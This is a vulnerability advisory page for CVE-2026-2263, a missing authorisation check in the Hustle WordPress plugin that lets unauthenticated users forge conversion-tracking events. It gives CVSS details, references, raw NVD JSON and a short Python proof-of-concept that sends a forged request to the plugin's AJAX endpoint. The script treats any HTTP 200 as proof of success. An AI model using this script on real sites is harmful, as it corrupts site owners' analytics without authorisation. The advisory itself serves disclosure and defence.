CVE-2026-2263

Description

The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

The Hustle Plugin <= 7.8.10.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Payload to exploit the missing capability check
payload = {
    "action": "hustle_module_converted",
    "module_id": "1",  # Replace with a valid or guessed module ID
    "page_id": "1"     # Optional, depending on plugin configuration
}

try:
    # Sending unauthenticated POST request
    response = requests.post(target_url, data=payload)

    # Check if request was successful (HTTP 200 usually implies processing in this context)
    if response.status_code == 200:
        print("[+] Exploit successful! Conversion event likely forged.")
    else:
        print("[-] Request failed with status code:", response.status_code)
        print("Response:", response.text)
except Exception as e:
    print("[!] An error occurred:", e)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2263
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2263
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2263/
[4] VulDB https://vuldb.com/cve/CVE-2026-2263
[5] https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047
[6] https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32
[7] https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311
[8] https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11
[9] https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2263", "sourceIdentifier": "[email protected]", "published": "2026-04-08T00:16:04.980", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve", "source": "[email protected]"}]}}